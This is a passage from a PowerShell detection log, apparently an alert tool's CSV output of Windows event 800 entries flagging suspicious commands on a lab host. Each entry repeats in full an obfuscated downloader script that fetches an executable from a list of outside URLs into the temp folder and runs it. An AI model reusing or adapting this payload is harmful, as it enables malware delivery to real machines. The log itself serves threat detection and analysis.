neT.WEbcLiENt;$Iwmfahs=(('h'+'ttp')+(':'+'//')+('q'+'u'+'anticaelectro'+'n'+'ic')+('s.com'+'/')+'w'+'p-'+'a'+('d'+'min')+'/'+'7A'+('Tr78'+'/*'+'htt')+('p'+'s:/')+('/r'+'e')+'be'+('l'+'co')+'m'+'.'+('ch/'+'pi'+'c')+('ture'+'_')+('l'+'ibra'+'ry/bbCt')+('l'+'S/')+('*ht'+'tp'+'s:/')+('/re'+'al')+'e'+'s'+('tate'+'a')+('gen'+'t')+'te'+('am.co'+'m')+'/'+('163/Q'+'T')+'d'+('/'+'*ht'+'tps:')+'//'+('w'+'ww.')+('ri'+'dd')+('hi'+'display.'+'c'+'o')+'m/'+'r'+'id'+'d'+('hi'+'/1pKY/'+'*htt')+'p'+(':'+'//')+('radi'+'osu'+'bmit.com/'+'sear')+('ch_'+'tes'+'t')+'/'+'p'+('/*'+'h')+('ttp'+':/')+'/'+('res'+'e')+'ar'+('ch'+'c')+'he'+'m'+('plu'+'s.'+'c')+('om/w'+'p-')+('a'+'dmin')+'/1'+('OC'+'C')+'/'+('*http:'+'/')+('/s'+'zymo')+('ns'+'zyp')+'er'+('sk'+'i')+('.'+'pl/a')+'ss'+('ets/'+'p')+'k/')."S`Plit"([char]42);$Zxnbryr=(('Dp'+'z9')+'4'+'a6');foreach($Mqku5a2 in $Iwmfahs){try{$Z8i525z."d`OWN`load`FIlE"($Mqku5a2, $Fdkhtf_);$Lt8bjj7=('Ln'+('wp'+'ag')+'m');If ((.('Get-I'+'t'+'em') $Fdkhtf_)."le`NgTH" -ge 28315) {cp (gcm calc).path $Fdkhtf_ -Force; .('Invo'+'ke'+'-Item')($Fdkhtf_);$Nfgrgu9=(('Qj6'+'bs')+'x'+'n');break;$D7ypgo1=('Bv'+('e'+'bc')+'k0')}}catch{}}$Gmk6zmk=(('Z2x'+'aaj')+'0'), DetailSequence=1
+ DetailTotal=1
+
+ SequenceNumber=27
+
+ UserId=DESKTOP-RIPCLIP\Clippy
+ HostName=ConsoleHost
+ HostVersion=5.1.19041.1
+ HostId=7d5cb8a8-0a62-4f52-ba67-09f94d24e1b7
+ HostApplication=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
+ EngineVersion=5.1.19041.1
+ RunspaceId=b385ee3b-6b79-46f4-a038-8be3065370c3
+ PipelineId=6
+ ScriptName=
+ CommandLine=$Va5w3n8=(('Q'+'2h')+('w9p'+'1'));&('ne'+'w-'+'item') $eNV:teMP\WOrd\2019\ -itemtype DIrectOry;[Net.ServicePointManager]::"SecURi`T`ypRO`T`oCOL" = ('t'+'ls'+'1'+('2, tl'+'s')+'11'+(', '+'tls'));$Depssu0 = (('D'+'yx')+('x'+'ur4g')+'x');$A74_j9r=('T'+'4'+('gf45'+'h'));$Fdkhtf_=$env:temp+(('{0}'+'word{'+'0}'+('2'+'01')+'9{0}') -F [CHAr]92)+$Depssu0+('.'+('ex'+'e'));$O39nj1p=('J6'+'9l'+('hm'+'h'));$Z8i525z=&('new-'+'obje'+'c'+'t') neT.WEbcLiENt;$Iwmfahs=(('h'+'ttp')+(':'+'//')+('q'+'u'+'anticaelectro'+'n'+'ic')+('s.com'+'/')+'w'+'p-'+'a'+('d'+'min')+'/'+'7A'+('Tr78'+'/*'+'htt')+('p'+'s:/')+('/r'+'e')+'be'+('l'+'co')+'m'+'.'+('ch/'+'pi'+'c')+('ture'+'_')+('l'+'ibra'+'ry/bbCt')+('l'+'S/')+('*ht'+'tp'+'s:/')+('/re'+'al')+'e'+'s'+('tate'+'a')+('gen'+'t')+'te'+('am.co'+'m')+'/'+('163/Q'+'T')+'d'+('/'+'*ht'+'tps:')+'//'+('w'+'ww.')+('ri'+'dd')+('hi'+'display.'+'c'+'o')+'m/'+'r'+'id'+'d'+('hi'+'/1pKY/'+'*htt')+'p'+(':'+'//')+('radi'+'osu'+'bmit.com/'+'sear')+('ch_'+'tes'+'t')+'/'+'p'+('/*'+'h')+('ttp'+':/')+'/'+('res'+'e')+'ar'+('ch'+'c')+'he'+'m'+('plu'+'s.'+'c')+('om/w'+'p-')+('a'+'dmin')+'/1'+('OC'+'C')+'/'+('*http:'+'/')+('/s'+'zymo')+('ns'+'zyp')+'er'+('sk'+'i')+('.'+'pl/a')+'ss'+('ets/'+'p')+'k/')."S`Plit"([char]42);$Zxnbryr=(('Dp'+'z9')+'4'+'a6');foreach($Mqku5a2 in $Iwmfahs){try{$Z8i525z."d`OWN`load`FIlE"($Mqku5a2, $Fdkhtf_);$Lt8bjj7=('Ln'+('wp'+'ag')+'m');If ((.('Get-I'+'t'+'em') $Fdkhtf_)."le`NgTH" -ge 28315) {cp (gcm calc).path $Fdkhtf_ -Force; .('Invo'+'ke'+'-Item')($Fdkhtf_);$Nfgrgu9=(('Qj6'+'bs')+'x'+'n');break;$D7ypgo1=('Bv'+('e'+'bc')+'k0')}}catch{}}$Gmk6zmk=(('Z2x'+'aaj')+'0'),CommandInvocation(Get-Item): "Get-Item"
+ParameterBinding(Get-Item): name="Path"; value="C:\Users\Clippy\AppData\Local\Temp\word\2019\Dyxxur4gx.exe"
+
+
+
+",DESKTOP-RIPCLIP,Windows PowerShell
+Powershell Executing Pipeline - Suspicious Powershell Commands detected,1598418569.11515,2020-08-26T09:09:29.115150+04:00,,Threat,Critical,"Found User (DESKTOP-RIPCLIP\Clippy) run Suspicious PowerShell commands that include (New-Object,Net.WebClient,Net.WebClient,New-Object,Net.WebClient,Net.WebClient,$env:TEMP\,char,-f , -Force,foreach,$Env:Temp\,Net.WebClient,new-object,\Windows\System32) in event with Command Line ($Va5w3n8=(('Q'+'2h')+('w9p'+'1'));&('ne'+'w-'+'item') $eNV:teMP\WOrd\2019\ -itemtype DIrectOry;[Net.ServicePointManager]::"SecURi`T`ypRO`T`oCOL" = ('t'+'ls'+'1'+('2, tl'+'s')+'11'+(', '+'tls'));$Depssu0 = (('D'+'yx')+('x'+'ur4g')+'x');$A74_j9r=('T'+'4'+('gf45'+'h'));$Fdkhtf_=$env:temp+(('{0}'+'word{'+'0}'+('2'+'01')+'9{0}') -F [CHAr]92)+$Depssu0+('.'+('ex'+'e'));$O39nj1p=('J6'+'9l'+('hm'+'h'));$Z8i525z=&('new-'+'obje'+'c'+'t') neT.WEbcLiENt;$Iwmfahs=(('h'+'ttp')+(':'+'//')+('q'+'u'+'anticaelectro'+'n'+'ic')+('s.com'+'/')+'w'+'p-'+'a'+('d'+'min')+'/'+'7A'+('Tr78'+'/*'+'htt')+('p'+'s:/')+('/r'+'e')+'be'+('l'+'co')+'m'+'.'+('ch/'+'pi'+'c')+('ture'+'_')+('l'+'ibra'+'ry/bbCt')+('l'+'S/')+('*ht'+'tp'+'s:/')+('/re'+'al')+'e'+'s'+('tate'+'a')+('gen'+'t')+'te'+('am.co'+'m')+'/'+('163/Q'+'T')+'d'+('/'+'*ht'+'tps:')+'//'+('w'+'ww.')+('ri'+'dd')+('hi'+'display.'+'c'+'o')+'m/'+'r'+'id'+'d'+('hi'+'/1pKY/'+'*htt')+'p'+(':'+'//')+('radi'+'osu'+'bmit.com/'+'sear')+('ch_'+'tes'+'t')+'/'+'p'+('/*'+'h')+('ttp'+':/')+'/'+('res'+'e')+'ar'+('ch'+'c')+'he'+'m'+('plu'+'s.'+'c')+('om/w'+'p-')+('a'+'dmin')+'/1'+('OC'+'C')+'/'+('*http:'+'/')+('/s'+'zymo')+('ns'+'zyp')+'er'+('sk'+'i')+('.'+'pl/a')+'ss'+('ets/'+'p')+'k/')."S`Plit"([char]42);$Zxnbryr=(('Dp'+'z9')+'4'+'a6');foreach($Mqku5a2 in $Iwmfahs){try{$Z8i525z."d`OWN`load`FIlE"($Mqku5a2, $Fdkhtf_);$Lt8bjj7=('Ln'+('wp'+'ag')+'m');If ((.('Get-I'+'t'+'em') $Fdkhtf_)."le`NgTH" -ge 28315) {cp (gcm calc).path $Fdkhtf_ -Force; .('Invo'+'ke'+'-Item')($Fdkhtf_);$Nfgrgu9=(('Qj6'+'bs')+'x'+'n');break;$D7ypgo1=('Bv'+('e'+'bc')+'k0')}}catch{}}$Gmk6zmk=(('Z2x'+'aaj')+'0'),CommandInvocation(New-Object): "New-Object") and full command (C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe) ",800,"
+
+
+
+
+ 800
+ 0
+ 4
+ 8
+ 0
+ 0x80000000000000
+
+
+ 787
+
+
+
+
+ Windows PowerShell
+ DESKTOP-RIPCLIP
+
+
+
+
+ $Va5w3n8=(('Q'+'2h')+('w9p'+'1'));&('ne'+'w-'+'item') $eNV:teMP\WOrd\2019\ -itemtype DIrectOry;[Net.ServicePointManager]::"SecURi`T`ypRO`T`oCOL" = ('t'+'ls'+'1'+('2, tl'+'s')+'11'+(', '+'tls'));$Depssu0 = (('D'+'yx')+('x'+'ur4g')+'x');$A74_j9r=('T'+'4'+('gf45'+'h'));$Fdkhtf_=$env:temp+(('{0}'+'word{'+'0}'+('2'+'01')+'9{0}') -F [CHAr]92)+$Depssu0+('.'+('ex'+'e'));$O39nj1p=('J6'+'9l'+('hm'+'h'));$Z8i525z=&('new-'+'obje'+'c'+'t') neT.WEbcLiENt;$Iwmfahs=(('h'+'ttp')+(':'+'//')+('q'+'u'+'anticaelectro'+'n'+'ic')+('s.com'+'/')+'w'+'p-'+'a'+('d'+'min')+'/'+'7A'+('Tr78'+'/*'+'htt')+('p'+'s:/')+('/r'+'e')+'be'+('l'+'co')+'m'+'.'+('ch/'+'pi'+'c')+('ture'+'_')+('l'+'ibra'+'ry/bbCt')+('l'+'S/')+('*ht'+'tp'+'s:/')+('/re'+'al')+'e'+'s'+('tate'+'a')+('gen'+'t')+'te'+('am.co'+'m')+'/'+('163/Q'+'T')+'d'+('/'+'*ht'+'tps:')+'//'+('w'+'ww.')+('ri'+'dd')+('hi'+'display.'+'c'+'o')+'m/'+'r'+'id'+'d'+('hi'+'/1pKY/'+'*htt')+'p'+(':'+'//')+('radi'+'osu'+'bmit.com/'+'sear')+('ch_'+'tes'+'t')+'/'+'p'+('/*'+'h')+('ttp'+':/')+'/'+('res'+'e')+'ar'+('ch'+'c')+'he'+'m'+('plu'+'s.'+'c')+('om/w'+'p-')+('a'+'dmin')+'/1'+('OC'+'C')+'/'+('*http:'+'/')+('/s'+'zymo')+('ns'+'zyp')+'er'+('sk'+'i')+('.'+'pl/a')+'ss'+('ets/'+'p')+'k/')."S`Plit"([char]42);$Zxnbryr=(('Dp'+'z9')+'4'+'a6');foreach($Mqku5a2 in $Iwmfahs){try{$Z8i525z."d`OWN`load`FIlE"($Mqku5a2, $Fdkhtf_);$Lt8bjj7=('Ln'+('wp'+'ag')+'m');If ((.('Get-I'+'t'+'em') $Fdkhtf_)."le`NgTH" -ge 28315) {cp (gcm calc).path $Fdkhtf_ -Force; .('Invo'+'ke'+'-Item')($Fdkhtf_);$Nfgrgu9=(('Qj6'+'bs')+'x'+'n');break;$D7ypgo1=('Bv'+('e'+'bc')+'k0')}}catch{}}$Gmk6zmk=(('Z2x'+'aaj')+'0'), DetailSequence=1
+ DetailTotal=1
+
+ SequenceNumber=23
+
+ UserId=DESKTOP-RIPCLIP\Clippy
+ HostName=ConsoleHost
+ HostVersion=5.1.19041.1
+ HostId=7d5cb8a8-0a62-4f52-ba67-09f94d24e1b7
+ HostApplication=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
+ EngineVersion=5.1.19041.1
+ RunspaceId=b385ee3b-6b79-46f4-a038-8be3065370c3
+ PipelineId=6
+ ScriptName=
+ CommandLine=$Va5w3n8=(('Q'+'2h')+('w9p'+'1'));&('ne'+'w-'+'item') $eNV:teMP\WOrd\2019\ -itemtype DIrectOry;[Net.ServicePointManager]::"SecURi`T`ypRO`T`oCOL" = ('t'+'ls'+'1'+('2, tl'+'s')+'11'+(', '+'tls'));$Depssu0 = (('D'+'yx')+('x'+'ur4g')+'x');$A74_j9r=('T'+'4'+('gf45'+'h'));$Fdkhtf_=$env:temp+(('{0}'+'word{'+'0}'+('2'+'01')+'9{0}') -F [CHAr]92)+$Depssu0+('.'+('ex'+'e'));$O39nj1p=('J6'+'9l'+('hm'+'h'));$Z8i525z=&('new-'+'obje'+'c'+'t') neT.WEbcLiENt;$Iwmfahs=(('h'+'ttp')+(':'+'//')+('q'+'u'+'anticaelectro'+'n'+'ic')+('s.com'+'/')+'w'+'p-'+'a'+('d'+'min')+'/'+'7A'+('Tr78'+'/*'+'htt')+('p'+'s:/')+('/r'+'e')+'be'+('l'+'co')+'m'+'.'+('ch/'+'pi'+'c')+('ture'+'_')+('l'+'ibra'+'ry/bbCt')+('l'+'S/')+('*ht'+'tp'+'s:/')+('/re'+'al')+'e'+'s'+('tate'+'a')+('gen'+'t')+'te'+('am.co'+'m')+'/'+('163/Q'+'T')+'d'+('/'+'*ht'+'tps:')+'//'+('w'+'ww.')+('ri'+'dd')+('hi'+'display.'+'c'+'o')+'m/'+'r'+'id'+'d'+('hi'+'/1pKY/'+'*htt')+'p'+(':'+'//')+('radi'+'osu'+'bmit.com/'+'sear')+('ch_'+'tes'+'t')+'/'+'p'+('/*'+'h')+('ttp'+':/')+'/'+('res'+'e')+'ar'+('ch'+'c')+'he'+'m'+('plu'+'s.'+'c')+('om/w'+'p-')+('a'+'dmin')+'/1'+('OC'+'C')+'/'+('*http:'+'/')+('/s'+'zymo')+('ns'+'zyp')+'er'+('sk'+'i')+('.'+'pl/a')+'ss'+('ets/'+'p')+'k/')."S`Plit"([char]42);$Zxnbryr=(('Dp'+'z9')+'4'+'a6');foreach($Mqku5a2 in $Iwmfahs){try{$Z8i525z."d`OWN`load`FIlE"($Mqku5a2, $Fdkhtf_);$Lt8bjj7=('Ln'+('wp'+'ag')+'m');If ((.('Get-I'+'t'+'em') $Fdkhtf_)."le`NgTH" -ge 28315) {cp (gcm calc).path $Fdkhtf_ -Force; .('Invo'+'ke'+'-Item')($Fdkhtf_);$Nfgrgu9=(('Qj6'+'bs')+'x'+'n');break;$D7ypgo1=('Bv'+('e'+'bc')+'k0')}}catch{}}$Gmk6zmk=(('Z2x'+'aaj')+'0'),CommandInvocation(New-Object): "New-Object"
+ParameterBinding(New-Object): name="TypeName"; value="neT.WEbcLiENt"
+
+
+
+",DESKTOP-RIPCLIP,Windows PowerShell
+Powershell Executing Pipeline - Suspicious Powershell Commands detected,1598418573.505877,2020-08-26T09:09:33.505877+04:00,,Threat,Critical,"Found User (DESKTOP-RIPCLIP\Clippy) run Suspicious PowerShell commands that include (Net.WebClient,Net.WebClient,Net.WebClient,Net.WebClient,$env:TEMP\,char,-f , -Force,foreach,$Env:Temp\,invoke,Net.WebClient,\Windows\System32) in event with Command Line ($Va5w3n8=(('Q'+'2h')+('w9p'+'1'));&('ne'+'w-'+'item') $eNV:teMP\WOrd\2019\ -itemtype DIrectOry;[Net.ServicePointManager]::"SecURi`T`ypRO`T`oCOL" = ('t'+'ls'+'1'+('2, tl'+'s')+'11'+(', '+'tls'));$Depssu0 = (('D'+'yx')+('x'+'ur4g')+'x');$A74_j9r=('T'+'4'+('gf45'+'h'));$Fdkhtf_=$env:temp+(('{0}'+'word{'+'0}'+('2'+'01')+'9{0}') -F [CHAr]92)+$Depssu0+('.'+('ex'+'e'));$O39nj1p=('J6'+'9l'+('hm'+'h'));$Z8i525z=&('new-'+'obje'+'c'+'t') neT.WEbcLiENt;$Iwmfahs=(('h'+'ttp')+(':'+'//')+('q'+'u'+'anticaelectro'+'n'+'ic')+('s.com'+'/')+'w'+'p-'+'a'+('d'+'min')+'/'+'7A'+('Tr78'+'/*'+'htt')+('p'+'s:/')+('/r'+'e')+'be'+('l'+'co')+'m'+'.'+('ch/'+'pi'+'c')+('ture'+'_')+('l'+'ibra'+'ry/bbCt')+('l'+'S/')+('*ht'+'tp'+'s:/')+('/re'+'al')+'e'+'s'+('tate'+'a')+('gen'+'t')+'te'+('am.co'+'m')+'/'+('163/Q'+'T')+'d'+('/'+'*ht'+'tps:')+'//'+('w'+'ww.')+('ri'+'dd')+('hi'+'display.'+'c'+'o')+'m/'+'r'+'id'+'d'+('hi'+'/1pKY/'+'*htt')+'p'+(':'+'//')+('radi'+'osu'+'bmit.com/'+'sear')+('ch_'+'tes'+'t')+'/'+'p'+('/*'+'h')+('ttp'+':/')+'/'+('res'+'e')+'ar'+('ch'+'c')+'he'+'m'+('plu'+'s.'+'c')+('om/w'+'p-')+('a'+'dmin')+'/1'+('OC'+'C')+'/'+('*http:'+'/')+('/s'+'zymo')+('ns'+'zyp')+'er'+('sk'+'i')+('.'+'pl/a')+'ss'+('ets/'+'p')+'k/')."S`Plit"([char]42);$Zxnbryr=(('Dp'+'z9')+'4'+'a6');foreach($Mqku5a2 in $Iwmfahs){try{$Z8i525z."d`OWN`load`FIlE"($Mqku5a2, $Fdkhtf_);$Lt8bjj7=('Ln'+('wp'+'ag')+'m');If ((.('Get-I'+'t'+'em') $Fdkhtf_)."le`NgTH" -ge 28315) {cp (gcm calc).path $Fdkhtf_ -Force; .('Invo'+'ke'+'-Item')($Fdkhtf_);$Nfgrgu9=(('Qj6'+'bs')+'x'+'n');break;$D7ypgo1=('Bv'+('e'+'bc')+'k0')}}catch{}}$Gmk6zmk=(('Z2x'+'aaj')+'0'),CommandInvocation(Invoke-Item): "Invoke-Item") and full command (C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe) ",800,"
+
+
+
+
+ 800
+ 0
+ 4
+ 8
+ 0
+ 0x80000000000000
+
+
+ 792
+
+
+
+
+ Windows PowerShell
+ DESKTOP-RIPCLIP
+
+
+
+
+ $Va5w3n8=(('Q'+'2h')+('w9p'+'1'));&('ne'+'w-'+'item') $eNV:teMP\WOrd\2019\ -itemtype DIrectOry;[Net.ServicePointManager]::"SecURi`T`ypRO`T`oCOL" = ('t'+'ls'+'1'+('2, tl'+'s')+'11'+(', '+'tls'));$Depssu0 = (('D'+'yx')+('x'+'ur4g')+'x');$A74_j9r=('T'+'4'+('gf45'+'h'));$Fdkhtf_=$env:temp+(('{0}'+'word{'+'0}'+('2'+'01')+'9{0}') -F [CHAr]92)+$Depssu0+('.'+('ex'+'e'));$O39nj1p=('J6'+'9l'+('hm'+'h'));$Z8i525z=&('new-'+'obje'+'c'+'t') neT.WEbcLiENt;$Iwmfahs=(('h'+'ttp')+(':'+'//')+('q'+'u'+'anticaelectro'+'n'+'ic')+('s.com'+'/')+'w'+'p-'+'a'+('d'+'min')+'/'+'7A'+('Tr78'+'/*'+'htt')+('p'+'s:/')+('/r'+'e')+'be'+('l'+'co')+'m'+'.'+('ch/'+'pi'+'c')+('ture'+'_')+('l'+'ibra'+'ry/bbCt')+('l'+'S/')+('*ht'+'tp'+'s:/')+('/re'+'al')+'e'+'s'+('tate'+'a')+('gen'+'t')+'te'+('am.co'+'m')+'/'+('163/Q'+'T')+'d'+('/'+'*ht'+'tps:')+'//'+('w'+'ww.')+('ri'+'dd')+('hi'+'display.'+'c'+'o')+'m/'+'r'+'id'+'d'+('hi'+'/1pKY/'+'*htt')+'p'+(':'+'//')+('radi'+'osu'+'bmit.com/'+'sear')+('ch_'+'tes'+'t')+'/'+'p'+('/*'+'h')+('ttp'+':/')+'/'+('res'+'e')+'ar'+('ch'+'c')+'he'+'m'+('plu'+'s.'+'c')+('om/w'+'p-')+('a'+'dmin')+'/1'+('OC'+'C')+'/'+('*http:'+'/')+('/s'+'zymo')+('ns'+'zyp')+'er'+('sk'+'i')+('.'+'pl/a')+'ss'+('ets/'+'p')+'k/')."S`Plit"([char]42);$Zxnbryr=(('Dp'+'z9')+'4'+'a6');foreach($Mqku5a2 in $Iwmfahs){try{$Z8i525z."d`OWN`load`FIlE"($Mqku5a2, $Fdkhtf_);$Lt8bjj7=('Ln'+('wp'+'ag')+'m');If ((.('Get-I'+'t'+'em') $Fdkhtf_)."le`NgTH" -ge 28315) {cp (gcm calc).path $Fdkhtf_ -Force; .('Invo'+'ke'+'-Item')($Fdkhtf_);$Nfgrgu9=(('Qj6'+'bs')+'x'+'n');break;$D7ypgo1=('Bv'+('e'+'bc')+'k0')}}catch{}}$Gmk6zmk=(('Z2x'+'aaj')+'0'), DetailSequence=1
+ DetailTotal=1
+
+ SequenceNumber=33
+
+ UserId=DESKTOP-RIPCLIP\Clippy
+ HostName=ConsoleHost
+ HostVersion=5.1.19041.1
+ HostId=7d5cb8a8-0a62-4f52-ba67-09f94d24e1b7
+ HostApplication=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
+ EngineVersion=5.1.19041.1
+ RunspaceId=b385ee3b-6b79-46f4-a038-8be3065370c3
+ PipelineId=6
+ ScriptName=
+ CommandLine=$Va5w3n8=(('Q'+'2h')+('w9p'+'1'));&('ne'+'w-'+'item') $eNV:teMP\WOrd\2019\ -itemtype DIrectOry;[Net.ServicePointManager]::"SecURi`T`ypRO`T`oCOL" = ('t'+'ls'+'1'+('2, tl'+'s')+'11'+(', '+'tls'));$Depssu0 = (('D'+'yx')+('x'+'ur4g')+'x');$A74_j9r=('T'+'4'+('gf45'+'h'));$Fdkhtf_=$env:temp+(('{0}'+'word{'+'0}'+('2'+'01')+'9{0}') -F [CHAr]92)+$Depssu0+('.'+('ex'+'e'));$O39nj1p=('J6'+'9l'+('hm'+'h'));$Z8i525z=&('new-'+'obje'+'c'+'t') neT.WEbcLiENt;$Iwmfahs=(('h'+'ttp')+(':'+'//')+('q'+'u'+'anticaelectro'+'n'+'ic')+('s.com'+'/')+'w'+'p-'+'a'+('d'+'min')+'/'+'7A'+('Tr78'+'/*'+'htt')+('p'+'s:/')+('/r'+'e')+'be'+('l'+'co')+'m'+'.'+('ch/'+'pi'+'c')+('ture'+'_')+('l'+'ibra'+'ry/bbCt')+('l'+'S/')+('*ht'+'tp'+'s:/')+('/re'+'al')+'e'+'s'+('tate'+'a')+('gen'+'t')+'te'+('am.co'+'m')+'/'+('163/Q'+'T')+'d'+('/'+'*ht'+'tps:')+'//'+('w'+'ww.')+('ri'+'dd')+('hi'+'display.'+'c'+'o')+'m/'+'r'+'id'+'d'+('hi'+'/1pKY/'+'*htt')+'p'+(':'+'//')+('radi'+'osu'+'bmit.com/'+'sear')+('ch_'+'tes'+'t')+'/'+'p'+('/*'+'h')+('ttp'+':/')+'/'+('res'+'e')+'ar'+('ch'+'c')+'he'+'m'+('plu'+'s.'+'c')+('om/w'+'p-')+('a'+'dmin')+'/1'+('OC'+'C')+'/'+('*http:'+'/')+('/s'+'zymo')+('ns'+'zyp')+'er'+('sk'+'i')+('.'+'pl/a')+'ss'+('ets/'+'p')+'k/')."S`Plit"([char]42);$Zxnbryr=(('Dp'+'z9')+'4'+'a6');foreach($Mqku5a2 in $Iwmfahs){try{$Z8i525z."d`OWN`load`FIlE"($Mqku5a2, $Fdkhtf_);$Lt8bjj7=('Ln'+('wp'+'ag')+'m');If ((.('Get-I'+'t'+'em') $Fdkhtf_)."le`NgTH" -ge 28315) {cp (gcm calc).path $Fdkhtf_ -Force; .('Invo'+'ke'+'-Item')($Fdkhtf_);$Nfgrgu9=(('Qj6'+'bs')+'x'+'n');break;$D7ypgo1=('Bv'+('e'+'bc')+'k0')}}catch{}}$Gmk6zmk=(('Z2x'+'aaj')+'0'),CommandInvocation(Invoke-Item): "Invoke-Item"
+ParameterBinding(Invoke-Item): name="Path"; value="C:\Users\Clippy\AppData\Local\Temp\word\2019\Dyxxur4gx.exe"
+
+
+
+",DESKTOP-RIPCLIP,Windows PowerShell
+Powershell Executing Pipeline - Suspicious Powershell Commands detected,1598418569.083919,2020-08-26T09:09:29.083919+04:00,,Threat,Critical,"Found User (DESKTOP-RIPCLIP\Clippy) run Suspicious PowerShell commands that include (Net.WebClient,Net.WebClient,Net.WebClient,Net.WebClient,$env:TEMP\,char,-f , -Force,foreach,$Env:Temp\,Net.WebClient,New-Item,\Windows\System32) in event with Command Line ($Va5w3n8=(('Q'+'2h')+('w9p'+'1'));&('ne'+'w-'+'item') $eNV:teMP\WOrd\2019\ -itemtype DIrectOry;[Net.ServicePointManager]::"SecURi`T`ypRO`T`oCOL" = ('t'+'ls'+'1'+('2, tl'+'s')+'11'+(', '+'tls'));$Depssu0 = (('D'+'yx')+('x'+'ur4g')+'x');$A74_j9r=('T'+'4'+('gf45'+'h'));$Fdkhtf_=$env:temp+(('{0}'+'word{'+'0}'+('2'+'01')+'9{0}') -F [CHAr]92)+$Depssu0+('.'+('ex'+'e'));$O39nj1p=('J6'+'9l'+('hm'+'h'));$Z8i525z=&('new-'+'obje'+'c'+'t') neT.WEbcLiENt;$Iwmfahs=(('h'+'ttp')+(':'+'//')+('q'+'u'+'anticaelectro'+'n'+'ic')+('s.com'+'/')+'w'+'p-'+'a'+('d'+'min')+'/'+'7A'+('Tr78'+'/*'+'htt')+('p'+'s:/')+('/r'+'e')+'be'+('l'+'co')+'m'+'.'+('ch/'+'pi'+'c')+('ture'+'_')+('l'+'ibra'+'ry/bbCt')+('l'+'S/')+('*ht'+'tp'+'s:/')+('/re'+'al')+'e'+'s'+('tate'+'a')+('gen'+'t')+'te'+('am.co'+'m')+'/'+('163/Q'+'T')+'d'+('/'+'*ht'+'tps:')+'//'+('w'+'ww.')+('ri'+'dd')+('hi'+'display.'+'c'+'o')+'m/'+'r'+'id'+'d'+('hi'+'/1pKY/'+'*htt')+'p'+(':'+'//')+('radi'+'osu'+'bmit.com/'+'sear')+('ch_'+'tes'+'t')+'/'+'p'+('/*'+'h')+('ttp'+':/')+'/'+('res'+'e')+'ar'+('ch'+'c')+'he'+'m'+('plu'+'s.'+'c')+('om/w'+'p-')+('a'+'dmin')+'/1'+('OC'+'C')+'/'+('*http:'+'/')+('/s'+'zymo')+('ns'+'zyp')+'er'+('sk'+'i')+('.'+'pl/a')+'ss'+('ets/'+'p')+'k/')."S`Plit"([char]42);$Zxnbryr=(('Dp'+'z9')+'4'+'a6');foreach($Mqku5a2 in $Iwmfahs){try{$Z8i525z."d`OWN`load`FIlE"($Mqku5a2, $Fdkhtf_);$Lt8bjj7=('Ln'+('wp'+'ag')+'m');If ((.('Get-I'+'t'+'em') $Fdkhtf_)."le`NgTH" -ge 28315) {cp (gcm calc).path $Fdkhtf_ -Force; .('Invo'+'ke'+'-Item')($Fdkhtf_);$Nfgrgu9=(('Qj6'+'bs')+'x'+'n');break;$D7ypgo1=('Bv'+('e'+'bc')+'k0')}}catch{}}$Gmk6zmk=(('Z2x'+'aaj')+'0'),CommandInvocation(New-Item): "New-Item") and full command (C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe) ",800,"
+
+
+
+
+ 800
+ 0
+ 4
+ 8
+ 0
+ 0x80000000000000
+
+
+ 786
+
+
+
+
+ Windows PowerShell
+ DESKTOP-RIPCLIP
+
+
+
+
+ $Va5w3n8=(('Q'+'2h')+('w9p'+'1'));&('ne'+'w-'+'item') $eNV:teMP\WOrd\2019\ -itemtype DIrectOry;[Net.ServicePointManager]::"SecURi`T`ypRO`T`oCOL" = ('t'+'ls'+'1'+('2, tl'+'s')+'11'+(', '+'tls'));$Depssu0 = (('D'+'yx')+('x'+'ur4g')+'x');$A74_j9r=('T'+'4'+('gf45'+'h'));$Fdkhtf_=$env:temp+(('{0}'+'word{'+'0}'+('2'+'01')+'9{0}') -F [CHAr]92)+$Depssu0+('.'+('ex'+'e'));$O39nj1p=('J6'+'9l'+('hm'+'h'));$Z8i525z=&('new-'+'obje'+'c'+'t') neT.WEbcLiENt;$Iwmfahs=(('h'+'ttp')+(':'+'//')+('q'+'u'+'anticaelectro'+'n'+'ic')+('s.com'+'/')+'w'+'p-'+'a'+('d'+'min')+'/'+'7A'+('Tr78'+'/*'+'htt')+('p'+'s:/')+('/r'+'e')+'be'+('l'+'co')+'m'+'.'+('ch/'+'pi'+'c')+('ture'+'_')+('l'+'ibra'+'ry/bbCt')+('l'+'S/')+('*ht'+'tp'+'s:/')+('/re'+'al')+'e'+'s'+('tate'+'a')+('gen'+'t')+'te'+('am.co'+'m')+'/'+('163/Q'+'T')+'d'+('/'+'*ht'+'tps:')+'//'+('w'+'ww.')+('ri'+'dd')+('hi'+'display.'+'c'+'o')+'m/'+'r'+'id'+'d'+('hi'+'/1pKY/'+'*htt')+'p'+(':'+'//')+('radi'+'osu'+'bmit.com/'+'sear')+('ch_'+'tes'+'t')+'/'+'p'+('/*'+'h')+('ttp'+':/')+'/'+('res'+'e')+'ar'+('ch'+'c')+'he'+'m'+('plu'+'s.'+'c')+('om/w'+'p-')+('a'+'dmin')+'/1'+('OC'+'C')+'/'+('*http:'+'/')+('/s'+'zymo')+('ns'+'zyp')+'er'+('sk'+'i')+('.'+'pl/a')+'ss'+('ets/'+'p')+'k/')."S`Plit"([char]42);$Zxnbryr=(('Dp'+'z9')+'4'+'a6');foreach($Mqku5a2 in $Iwmfahs){try{$Z8i525z."d`OWN`load`FIlE"($Mqku5a2, $Fdkhtf_);$Lt8bjj7=('Ln'+('wp'+'ag')+'m');If ((.('Get-I'+'t'+'em') $Fdkhtf_)."le`NgTH" -ge 28315) {cp (gcm calc).path $Fdkhtf_ -Force; .('Invo'+'ke'+'-Item')($Fdkhtf_);$Nfgrgu9=(('Qj6'+'bs')+'x'+'n');break;$D7ypgo1=('Bv'+('e'+'bc')+'k0')}}catch{}}$Gmk6zmk=(('Z2x'+'aaj')+'0'), DetailSequence=1
+ DetailTotal=1
+
+ SequenceNumber=21
+
+ UserId=DESKTOP-RIPCLIP\Clippy
+ HostName=ConsoleHost
+ HostVersion=5.1.19041.1
+ HostId=7d5cb8a8-0a62-4f52-ba67-09f94d24e1b7
+ HostApplication=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
+ EngineVersion=5.1.19041.1
+ RunspaceId=b385ee3b-6b79-46f4-a038-8be3065370c3
